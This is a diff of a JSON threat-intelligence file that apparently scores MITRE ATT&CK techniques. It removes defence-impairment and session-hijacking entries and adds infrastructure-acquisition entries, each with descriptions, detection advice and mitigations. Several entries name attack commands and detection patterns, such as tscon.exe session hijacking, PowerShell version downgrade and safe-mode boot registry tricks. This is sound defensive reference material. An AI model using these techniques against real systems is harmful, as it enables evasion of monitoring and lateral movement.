-                "description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. ",
-                "detection": "Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.\n\nDepending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\AUTOLOGGER_NAME\\{PROVIDER_GUID}",
+                "tid": "T1583.003",
+                "name": "Acquire Infrastructure: Virtual Private Server",
+                "url": "https://attack.mitre.org/techniques/T1583/003",
+                "description": "Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.\n\nAcquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)",
+                "detection": "Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
                 "mitigations": [
                     {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    },
-                    {
-                        "mid": "M1054",
-                        "name": "Software Configuration",
-                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                        "url": "https://attack.mitre.org/mitigations/M1054"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1562.007",
-                "name": "Impair Defenses: Disable or Modify Cloud Firewall",
-                "url": "https://attack.mitre.org/techniques/T1562/007",
-                "description": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity.(Citation: Expel IO Evil in AWS)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.",
-                "detection": "Monitor cloud logs for modification or creation of new security groups or firewall rules.",
+                "tid": "T1583.004",
+                "name": "Acquire Infrastructure: Server",
+                "url": "https://attack.mitre.org/techniques/T1583/004",
+                "description": "Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.\n\nAdversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)",
+                "detection": "Once adversaries have provisioned a server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
                 "mitigations": [
                     {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1562.008",
-                "name": "Impair Defenses: Disable Cloud Logs",
-                "url": "https://attack.mitre.org/techniques/T1562/008",
-                "description": "An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. \n\nCloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)",
-                "detection": "Monitor logs for API calls to disable logging. In AWS, monitor for: StopLogging and DeleteTrail.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: google.logging.v2.ConfigServiceV2.UpdateSink.(Citation: Configuring Data Access audit logs)  In Azure, monitor for az monitor diagnostic-settings delete.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled.",
+                "tid": "T1583.005",
+                "name": "Acquire Infrastructure: Botnet",
+                "url": "https://attack.mitre.org/techniques/T1583/005",
+                "description": "Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)",
+                "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).",
                 "mitigations": [
                     {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1562.009",
-                "name": "Impair Defenses: Safe Mode Boot",
-                "url": "https://attack.mitre.org/techniques/T1562/009",
-                "description": "Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)\n\nAdversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)\n\nAdversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)",
-                "detection": "Monitor Registry modification and additions for services that may start on safe mode. For example, a program can be forced to start on safe mode boot by adding a \\* in front of the \"Startup\" value name: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\[\"\\*Startup\"=\"{Path}\"] or by adding a key to HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal.(Citation: BleepingComputer REvil 2021)(Citation: Sophos Snatch Ransomware 2019)\n\nMonitor execution of processes and commands associated with making configuration changes to boot settings, such as bcdedit.exe and bootcfg.exe.(Citation: Microsoft bcdedit 2021)(Citation: Microsoft Bootcfg)(Citation: Sophos Snatch Ransomware 2019)",
+                "tid": "T1583.006",
+                "name": "Acquire Infrastructure: Web Services",
+                "url": "https://attack.mitre.org/techniques/T1583/006",
+                "description": "Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.",
+                "detection": "Once adversaries leverage the web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).",
                 "mitigations": [
                     {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1054",
-                        "name": "Software Configuration",
-                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                        "url": "https://attack.mitre.org/mitigations/M1054"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
-            },
+            }
+        ],
+        "mitigations": [
             {
-                "tid": "T1562.010",
-                "name": "Impair Defenses: Downgrade Attack",
-                "url": "https://attack.mitre.org/techniques/T1562/010",
-                "description": "Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)\n\nAdversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014)",
-                "detection": "Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: powershell –v 2). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment.",
-                "mitigations": [
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    }
-                ]
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {},
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1583.001",
+        "name": "Acquire Infrastructure: Domains",
+        "description": "Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.\n\nAdversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016)\n\nDomain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)",
+        "url": "https://attack.mitre.org/techniques/T1583/001",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.(Citation: ThreatConnect Infrastructure Dec 2020)\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Domain Name: Active DNS",
+            "Domain Name: Domain Registration",
+            "Domain Name: Passive DNS"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1583",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1022",
-                "name": "Restrict File and Directory Permissions",
-                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1022"
-            },
-            {
-                "mid": "M1024",
-                "name": "Restrict Registry Permissions",
-                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
-                "url": "https://attack.mitre.org/mitigations/M1024"
-            },
-            {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 1.8047619047619048,
-        "adjusted_score": 1.8047619047619048,
-        "has_car": true,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
-        "cis_controls": [
-            "3.3",
-            "4.1",
-            "4.7",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2",
-            "6.8"
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1583.002",
+        "name": "Acquire Infrastructure: DNS Server",
+        "description": "Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.\n\nBy running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)",
+        "url": "https://attack.mitre.org/techniques/T1583/002",
+        "tactics": [
+            "Resource Development"
         ],
-        "nist_controls": [
-            "AC-2",
-            "AC-3",
-            "AC-5",
-            "AC-6",
-            "CA-7",
-            "CA-8",
-            "CM-2",
-            "CM-5",
-            "CM-6",
-            "CM-7",
-            "IA-2",
-            "IA-4",
-            "RA-5",
-            "SI-3",
-            "SI-4",
-            "SI-7"
+        "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
+        "platforms": [
+            "PRE"
         ],
-        "process_coverage": true,
-        "network_coverage": true,
-        "file_coverage": true,
-        "cloud_coverage": true,
-        "hardware_coverage": true,
-        "actionability_score": {
-            "combined_score": 0.7047619047619047,
-            "mitigation_score": 0.43636363636363634,
-            "detection_score": 1
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 1
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1583",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
     },
     {
-        "tid": "T1563",
-        "name": "Remote Service Session Hijacking",
-        "description": "Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.\n\nAdversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack)",
-        "url": "https://attack.mitre.org/techniques/T1563",
+        "tid": "T1583.003",
+        "name": "Acquire Infrastructure: Virtual Private Server",
+        "description": "Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.\n\nAcquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)",
+        "url": "https://attack.mitre.org/techniques/T1583/003",
         "tactics": [
-            "Lateral Movement"
+            "Resource Development"
         ],
-        "detection": "Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\n\nMonitor for processes and command-line arguments associated with hijacking service sessions.",
+        "detection": "Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "PRE"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "Logon Session: Logon Session Creation",
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow",
-            "Process: Process Creation"
+            "Internet Scan: Response Content",
+            "Internet Scan: Response Metadata"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1563.001",
-                "name": "Remote Service Session Hijacking: SSH Hijacking",
-                "url": "https://attack.mitre.org/techniques/T1563/001",
-                "description": "Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.\n\nIn order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)\n\n[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).",
-                "detection": "Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.",
-                "mitigations": [
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    }
-                ]
-            },
+        "is_subtechnique": true,
+        "supertechnique": "T1583",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1563.002",
-                "name": "Remote Service Session Hijacking: RDP Hijacking",
-                "url": "https://attack.mitre.org/techniques/T1563/002",
-                "description": "Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)\n\nAdversaries may perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\\windows\\system32\\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)",
-                "detection": "Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.\n\nUse of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1035",
-                        "name": "Limit Access to Resource Over Network",
-                        "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1035"
-                    },
-                    {
-                        "mid": "M1030",
-                        "name": "Network Segmentation",
-                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                        "url": "https://attack.mitre.org/mitigations/M1030"
-                    },
-                    {
-                        "mid": "M1028",
-                        "name": "Operating System Configuration",
-                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1028"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1583.004",
+        "name": "Acquire Infrastructure: Server",
+        "description": "Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.\n\nAdversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)",
+        "url": "https://attack.mitre.org/techniques/T1583/004",
+        "tactics": [
+            "Resource Development"
+        ],
